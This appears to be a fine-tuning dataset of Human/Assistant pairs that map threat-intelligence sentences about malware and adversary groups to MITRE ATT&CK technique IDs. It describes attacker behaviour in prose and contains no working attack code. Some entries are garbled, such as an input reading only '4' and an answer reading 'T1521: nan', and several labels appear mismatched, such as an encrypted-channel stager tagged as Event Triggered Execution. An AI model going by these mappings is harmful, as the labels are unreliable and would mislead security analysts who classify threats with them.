Human:Find the techniques and ID from MITRE ATT&CK framework.,Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events .### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has breached Managed Service Providers to deliver malware to MSP customers.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can collect the victim’s IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another Lazarus Group malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used downloaded encrypted payloads over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the “Hardware UUID” listed in the system information application, as seen in the Figure 3 screenshot of our analysis system### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is common behavior that can be used across different platforms and the network to evade defenses.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has has relied on users opening malicious links delivered through spearphishing to execute malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can discover and collect victim system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser deletes its original installer file once installation is complete.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to discover the username on the infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer will shut down the compromised system after it is done modifying system configuration settings.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use purchased domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Unix shell commands and scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf can download remote files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to base64 encode C2 communications.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories .### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can communicate over FTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can dump passwords and save them into \ProgramData\Mail\MailAg\pwds.txt.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can crash a debugger by passing a format string to OutputDebugStringA.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has removed the watermark associated with enabling the TESTSIGNING boot configuration option by removing the relevant strings in the user32.dll.mui of the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include Arp, ipconfig/ifconfig, nbtstat, and route.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has the ability to use HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has attempted to get victims to open malicious Microsoft Word and PDF attachment sent via spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wiarp creates a backdoor through which remote attackers can create a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework., COM execution### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM created high-privileged domain user accounts to maintain access to victim networks.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can enumerate and query for information contained within the Windows Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has used the DWriteCreateFactory function to load additional modules.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can query service status using QueryServiceStatusEx function.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application webpages served to Internet Explorer .### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSInfo enumerates local and domain users USBferry can use net user to gather information about local accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has used code signing certificates issued to fake companies to bypass security controls.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some Linux systems, this is set by default to ""ignoreboth"" which covers both of the previous examples.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT has been delivered via Word documents using DDE for execution.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Ke3chang backdoors achieved persistence by adding a Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser has used DLL side-loading.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 listed connected network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI bypassed UAC with the “AlwaysNotify” settings.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has also impersonated the legitimate Flash installer file name ""install_flashplayer.exe"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute active reconnaissance scans to gather information that can be used during targeting.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JHUHUGIT variant encodes C2 POST data base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability on unpatched computers.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encrypting communications using AES and RSA public key cryptography 5### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has used a Unix shell script to run a series of commands targeting macOS.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation configuration.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The module loader can load DLLs: * via specification of the DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with pathname ; * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name=""filename.extension"" loadFrom=""fully-qualified or relative pathname""> in an embedded or external ""application manifest"".### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon looks for and attempts to stop database processes.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can enumerate domain groups by executing net.exe group /domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 injects its malware variant, ROKRAT, into the cmd.exe process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to enumerate running processes on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can deobfuscate the main backdoor code.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HIDEDRV is a rootkit that hides certain operating system artifacts.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, adversaries may first create a malicious registry Class Identifier subkey, which uniquely identifies a Component Object Model class object.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These entries will allow an application to automatically start during the startup of a desktop environment after user logon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TLS callback injection involves manipulating pointers inside a portable executable to redirect a process to malicious code before reaching the code's legitimate entry point.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has gathered information about running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used net start and net use for system service discovery.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER uses -windowstyle hidden to conceal a PowerShell window that downloads a payload.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy injects its DLL component into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that leveraged WMI for execution and querying host information.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The majority of documents used the name “gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant can perform dynamic DLL importing and API lookups using LoadLibrary and GetProcAddress on obfuscated strings.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 manipulated .lnk files to gather user credentials in conjunction with Forced Authentication.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic, poisoning the NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.  APT28 Uses Malicious Document to Target Hospitality Industry FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry, including hotels in at least seven European countries and one Middle Eastern country in early July### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used Base64 to encode malicious links.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM has used PsExec to move laterally between hosts in the target network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Audio files may be written to disk and exfiltrated later.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic with Web Protocols or even enabling Adversary-in-the-Middle if the certificate is trusted or otherwise added to the root of trust Install Root Certificate.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A OilRig macro has run a PowerShell command to decode file contents.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By abusing features of common networking protocols that can determine the flow of network traffic , adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can identify the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY uses a WMI event subscription to establish persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can use WMI queries to gather system information.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 drops a Windows shortcut file for execution.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can use Tasklist to collect a list of running tasks.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can identify the groups the user on a compromised host belongs to.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon opening the attachment , the adversary's payload exploits a vulnerability or directly executes on the user's system.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can execute command line scripts received from C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team used a backdoor to enumerate information about the infected system's operating system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique bypasses Windows file access controls as well as file system monitoring tools.### Assistant: T1006: Direct Volume Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ecipekac has used a valid, legitimate digital signature to evade detection.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can decode and decrypt data received from C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Navigating to the web page manually to view:source reveals the code, which at the time of writing happened to not be obfuscated in any significant way### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can gather user names.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 relies heavily on web shells for an initial foothold into an organization### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 modified the Registry to perform multiple techniques through the use of Reg.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The TrickBot downloader has used an icon to appear as a Microsoft Word document.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind has a command to return a directory listing for a specified directory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One variant of Zebrocy uses WMI queries to gather information.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and control information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can communicate with the C2 via base32-encoded subdomains.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 added newly created accounts to the administrators group to maintain elevated access.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used remote access tools that leverage DNS in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke has been packed with the UPX packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LLMNR is based upon the Domain Name System format and allows hosts on the same local link to perform name resolution for other hosts.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can perform pass the hash.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can uninstall itself, including deleting its executable.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork has obfuscated a script with Crypto Obfuscator.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Komplex trojan supports file deletion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has used a hardcoded GitHub repository as a fallback channel.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network Yandex.Direct.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can occur through social engineering and typically requires user action to grant access.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaos conducts brute force attacks against SSH services to gain initial access.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet removes itself from the system through a DLL export by deleting specific files and stored procedures.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A tool can be used for malicious purposes by an adversary, but were not intended to be used for those purposes .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used Ncrack to reveal credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Figure 9, below, red indicates targeted IP addresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates criminal attack IP addresses, malware used, registrant information, and domains: Figure 9### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.### Assistant: T1609: Container Administration Command" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT collects information about the OS as well as system up-time upon receiving a connection from a backdoor.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck abuses NTFS transactions to launch and conceal malicious processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell to maintain access to victim networks.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer uses API calls to enumerate the infected system's ARP table.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from 